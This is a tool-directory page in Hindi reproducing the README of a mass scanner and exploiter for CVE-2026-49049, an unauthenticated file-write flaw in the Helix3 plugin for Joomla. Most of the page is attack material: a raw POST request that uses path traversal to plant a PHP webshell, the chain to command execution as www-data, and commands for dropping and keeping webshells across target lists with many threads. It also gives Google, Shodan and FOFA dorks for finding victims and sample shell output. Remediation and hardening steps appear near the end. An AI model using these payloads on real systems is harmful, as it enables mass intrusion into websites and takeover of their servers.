Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-49049 — CVE-2026-49049 Helix3 (JoomShaper) Joomla Unauthenticated AJAX RCE Scanner | Kitploit
उपकरण/GitHubGitHub/exdev994/cve-2026-49049
ReconnaissanceVulnerability ScannersPayload GenerationExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubexdev994/cve-2026-49049

CVE-2026-49049

CVE-2026-49049 Helix3 (JoomShaper) Joomla Unauthenticated AJAX RCE Scanner

रिपॉजिटरी देखें
1 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-49049 — Helix3 (JoomShaper) Joomla अप्रमाणित AJAX RCE स्कैनर

CVE CVSS Python License Author

मास स्कैनर / सत्यापनकर्ता CVE-2026-49049 के लिए: Joomla के Helix3 Framework प्लगइन में अप्रमाणित AJAX हैंडलर (v1.0 – 3.1.0, 3.1.1+ में पैच किया गया)।

केवल अधिकृत परीक्षण। केवल उन प्रणालियों पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण की लिखित अनुमति है।


विषयसूची

  • भेद्यता अवलोकन
  • RCE श्रृंखला
  • स्थापना
  • उपयोग विधि (Usage)
  • उदाहरण आउटपुट
  • टोही डॉर्क्स
  • सुधार विधि (Remediation)
  • परियोजना संरचना
  • योगदान
  • संदर्भ
  • अस्वीकरण

भेद्यता अवलोकन

हैंडलर onAjaxHelix3() फ़ाइल plugins/ajax/helix3/helix3.php में Joomla com_ajax के माध्यम से बिना प्रमाणीकरण / CSRF टोकन के पहुँच योग्य है:

root@kitploit:~
POST /index.php?option=com_ajax&plugin=helix3&format=json
Content-Type: application/x-www-form-urlencoded

data[action]=save&data[layoutName]=../../up.php&data[content]=<?php system($_GET['cmd']); ?>

RCE श्रृंखला

सक्रिय सामूहिक शोषण अक्सर डबल-एक्सटेंशन वेबशेल गिराता है:

  1. Helix3 + संस्करण < 3.1.1 का पता लगाएँ
  2. save का उपयोग layoutName=../../up.php + PHP वेबशेल सामग्री के साथ करें
  3. सेव .json जोड़ता है → up.php.json वेब रूट में आता है
  4. Apache AddHandler मल्टी-एक्सटेंशन .php टोकन को निष्पादित करता है
  5. GET /up.php.json?cmd=id → uid=33(www-data) = SHELL OK
root@kitploit:~
डिटेक्ट Helix3
    → POST com_ajax?plugin=helix3 (action=save, traversal)
    → up.php.json लिखा
    → GET up.php.json?cmd=id
    → uid=33(www-data)

स्थापना

root@kitploit:~
git clone https://github.com/ExDev994/CVE-2026-49049.git
cd CVE-2026-49049
pip install -r requirements.txt

आवश्यकताएँ: requests>=2.31.0, colorama>=0.4.6, Python 3.9+।


उपयोग विधि (Usage)

1. लक्ष्य तैयार करें

targets.txt संपादित करें — प्रति पंक्ति एक URL/होस्ट (# = टिप्पणी)। Joomla पथ बनाए रखा गया है:

root@kitploit:~
# उदाहरण
https://example.com/
https://example.com/joomla/
http://192.168.1.50/

2. केवल-पढ़ने के लिए स्कैन (केवल पहचान)

वेबशेल ड्रॉप नहीं करता। संस्करण जाँच + save / remove / import प्रोब करें:

root@kitploit:~
python3 scan.py -f targets.txt --scan -o results.txt

3. ऑटो: पहचान + वेबशेल ड्रॉप + RCE सत्यापन

root@kitploit:~
python3 scan.py -f targets.txt --auto -c "id" -o results.txt

4. एकल लक्ष्य

root@kitploit:~
python3 scan.py -t https://target.tld/joomla/ --auto -c "id"

5. उन्नत विकल्प

root@kitploit:~
# सत्यापन के बाद वेबशेल रखें (अधिकृत डेमो)
python3 scan.py -f targets.txt --auto --keep

# कस्टम वेबशेल नाम + ट्रैवर्सल गहराई
python3 scan.py -f targets.txt --auto \
  --webshell-name up.php \
  --traversal-depths "../../,../../../"

# JSON रिपोर्ट + समवर्तीता
python3 scan.py -f targets.txt --auto -c "whoami" \
  --threads 20 --timeout 15 \
  -o results.txt --json report.json

# प्रॉक्सी (Burp / आदि)
python3 scan.py -t https://target.tld/ --scan --proxy http://127.0.0.1:8080

महत्वपूर्ण फ़्लैग

चेतावनी: मोड --auto पथ ट्रैवर्सल के माध्यम से वेबशेल लिखने का प्रयास करता है। डिफ़ॉल्ट: सत्यापन के बाद वेबशेल हटा दिया जाता है। केवल अधिकृत डेमो के लिए --keep का उपयोग करें।


उदाहरण आउटपुट

टर्मिनल सभी स्थितियाँ दिखाता है (प्रगति)। results.txt केवल वही रखता है जो असुरक्षित हैं:

root@kitploit:~
[v] CVE-2026-49049 SHELL OK  https://target.tld  Helix3 2.5.6  save=Y remove=Y import=N
[id] -> uid=33(www-data) gid=33(www-data) groups=33(www-data)
    shell: https://target.tld/up.php.json?cmd=id
[ ] VULN (no shell)         https://target.tld  Helix3 3.0.2  save=Y remove=Y import=Y

अन्य लेबल (PATCHED, NOT_HELIX3, TIMEOUT, UNKNOWN) केवल टर्मिनल में, results.txt में नहीं।


टोही डॉर्क्स

नीचे दिए गए डॉर्क का उपयोग Helix3 / Joomla संपत्तियों को खोजने के लिए करें जो प्रभावित हो सकती हैं। केवल अनुमत लक्ष्यों को स्कैन करें।

Google

root@kitploit:~
inurl:templates/shaper_helix3/templateDetails.xml
inurl:"templates/shaper_helix3"
"shaper_helix3" "Joomla"
inurl:index.php?option=com_ajax "helix3"
"powered by Helix" Joomla
intitle:"Home" "shaper_helix3"
inurl:/templates/helix3/

Shodan

root@kitploit:~
http.html:"shaper_helix3"
http.html:"Helix3" http.html:"Joomla"
http.title:"Joomla" "shaper_helix3"
http.html:"/templates/shaper_helix3/"
http.html:"joomshaper" product:"Joomla"
html:"plg_system_helix3"

FOFA

root@kitploit:~
body="shaper_helix3"
body="/templates/shaper_helix3/" && body="Joomla"
body="Helix3" && body="joomshaper"
body="plg_ajax_helix3" || body="onAjaxHelix3"
title="Joomla" && body="shaper_helix3"
body="templateDetails.xml" && body="helix3"

मैन्युअल फ़िंगरप्रिंट (होस्ट प्राप्त करने के बाद)

root@kitploit:~
# संस्करण जाँच
curl -sk 'https://TARGET/templates/shaper_helix3/templateDetails.xml' | grep -i version

# बिना प्रमाणीकरण save प्रोब (केवल अधिकृत)
curl -sk -X POST \
  'https://TARGET/index.php?option=com_ajax&plugin=helix3&format=json' \
  -d 'data[action]=save&data[layoutName]=_test_probe&data[content]={"probe":"test"}'

सुधार विधि (Remediation)

1. तुरंत पैच करें (अनिवार्य)

System – Helix3 Framework और Helix3 – Ajax प्लगइन को 3.1.1 या नए (अनुशंसित 3.1.2) में अपडेट करें।

  • Joomla बैकएंड → System → Update / Extensions
  • या JoomShaper से आधिकारिक पैकेज डाउनलोड करें और मैन्युअल इंस्टॉल करें

2. यदि पहले से समझौता / विकृत हो चुका है

अपडेट DB में पहले से डाले गए पेलोड को साफ़ नहीं करता।

  1. बैकएंड → Site Template Styles → सक्रिय Helix3 टेम्पलेट
  2. Custom Code खोलें — Custom JavaScript / CSS / Before Head में बाहरी स्क्रिप्ट हटाएँ
  3. तालिका #__template_styles में params कॉलम को custom_js / custom_css इंजेक्शन के लिए जाँचें
  4. वेब रूट / templates / tmp / media में संदिग्ध फ़ाइलें हटाएँ:
    • up.php.json, cox.json, *.php.json, अन्य वेबशेल
  5. एडमिन क्रेडेंशियल बदलें, उपयोगकर्ता खातों की समीक्षा करें, cron / शेड्यूल किए गए कार्यों का ऑडिट करें

सामान्य समझौता संकेत: विकृति "Hacked by AntonKill" / "trenggalek6etar", custom_js इंजेक्शन, अज्ञात JSON फ़ाइलें।

3. हार्डनिंग (गहराई में सुरक्षा)

Apache — AddHandler मल्टी-एक्सटेंशन का उपयोग न करें; इसके बजाय उपयोग करें:

root@kitploit:~
<FilesMatch "\.php$">
    SetHandler application/x-httpd-php
</FilesMatch>

Nginx:

root@kitploit:~
location ~ \.php$ {
    try_files $uri =404;
    fastcgi_pass unix:/run/php/php-fpm.sock;
}

PHP php.ini:

root@kitploit:~
disable_functions = system,exec,shell_exec,passthru,proc_open,popen,pcntl_exec

अपलोड / फ़ाइल लेखन: फ़ाइल नाम पुनर्जीवित करें, मल्टी-डॉट एक्सटेंशन अस्वीकार करें, सार्वजनिक निर्देशिका में AllowOverride None।

4. पैच के बाद सत्यापन

root@kitploit:~
python3 scan.py -t https://YOUR-SITE/ --scan
# अपेक्षित: PATCHED  Helix3 3.1.1+  (या NOT_HELIX3 यदि प्लगइन अनइंस्टॉल किया गया)

परियोजना संरचना

root@kitploit:~
CVE-2026-49049/
├── scan.py              # CLI प्रवेश बिंदु
├── core/
│   ├── engine.py        # ThreadPoolExecutor + परिणाम (केवल असुरक्षित फ़ाइल में)
│   ├── probe.py         # Helix3 पहचान + save/remove/import + RCE ड्रॉप
│   └── target.py        # targets.txt को पार्स / सामान्य करें
├── utils/
│   └── banner.py
├── targets.txt          # इनपुट लक्ष्य
├── results.txt          # उत्पन्न (केवल VULN / SHELL_OK)
├── requirements.txt
└── README.md

योगदान

समुदाय से योगदान स्वीकार किया जाता है। अनुरक्षक: ExDev994।

दिशानिर्देश

  • लाइव लक्ष्य / स्कैन परिणाम / वेबशेल / क्रेडेंशियल कमिट न करें
  • चेतावनी “केवल अधिकृत परीक्षण” को कम न करें
  • छोटे PR पसंद करें (प्रति PR एक विषय)
  • मौजूदा Python शैली का पालन करें (from __future__ import annotations, type hints)
  • स्थानीय परीक्षण: python3 -m py_compile scan.py core/*.py utils/*.py और python3 scan.py --help

मुद्दे

बग/सुविधा अनुरोध Issues पर रिपोर्ट करें। शामिल करें:

  • Python & OS संस्करण
  • चलाया गया कमांड
  • आउटपुट / ट्रेसबैक (संवेदनशील लक्ष्य छिपाएँ)

योगदानकर्ता

योगदानकर्ताभूमिका
ExDev994लेखक / अनुरक्षक

भेद्यता मूल रूप से Phil Taylor (mySites.guru) द्वारा रिपोर्ट की गई। यह रिपॉजिटरी एक स्वतंत्र स्कैनर कार्यान्वयन है और JoomShaper या Open Source Matters से संबद्ध नहीं है।


संदर्भ

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-49049
  • सलाह (mySites.guru): https://mysites.guru/blog/helix3-security-update-changelog-failure/
  • JoomShaper Helix3: https://www.joomshaper.com/
  • केवल-पढ़ने के लिए PoC संदर्भ: https://github.com/shinthink/CVE-2026-49049
  • यह रिपॉजिटरी: https://github.com/ExDev994/CVE-2026-49049

अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है।

कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है और इसमें इंडोनेशिया UU ITE, US CFAA, और अन्य क्षेत्राधिकारों के समान क़ानूनों का उल्लंघन हो सकता है।

लेखक (ExDev994) दुरुपयोग के लिए कोई देयता नहीं मानता। इस सॉफ़्टवेयर का उपयोग करके आप अपने कार्यों की पूरी जिम्मेदारी स्वीकार करते हैं। मोड --auto एक अस्थायी वेबशेल गिराता है — केवल अधिकृत लक्ष्यों पर उपयोग करें।

टूल डाउनलोड करें
क्रियाप्रभावसंस्करण
saveमनमाना JSON फ़ाइल लेखन + पथ ट्रैवर्सल1.0 – 3.1.0
removeमनमाना फ़ाइल हटाना (कोई एक्सटेंशन/पथ प्रतिबंध नहीं)1.0 – 3.1.0
importDB में टेम्पलेट पैरामीटर अधिलेखित (custom_js अनएस्केप्ड → XSS/विकृति)केवल v3.x
Helix3 संस्करणsave / removeimportस्थिति
1.0 – 2.xअसुरक्षितमौजूद नहींअसुरक्षित
3.0 – 3.1.0असुरक्षितअसुरक्षितअसुरक्षित
3.1.1+पैच किया गयापैच किया गयासुरक्षित
फ़्लैगविवरण
-f / --fileलक्ष्य फ़ाइल सूची (डिफ़ॉल्ट: targets.txt यदि -t अनुपस्थित)
-t / --targetएकल लक्ष्य URL
--scanकेवल-पढ़ने के लिए पहचान
--autoपहचान + RCE सत्यापन (डिफ़ॉल्ट)
-c / --cmdकमांड सत्यापन (डिफ़ॉल्ट: id)
-o / --outputपरिणाम फ़ाइल — केवल VULN / SHELL_OK लक्ष्य
--jsonसंरचित JSON रिपोर्ट
--keepसत्यापन के बाद वेबशेल को ऑटो-हटाएँ नहीं
--threadsसमवर्ती कार्यकर्ता (डिफ़ॉल्ट: 15)
--timeoutHTTP टाइमआउट सेकंड (डिफ़ॉल्ट: 15)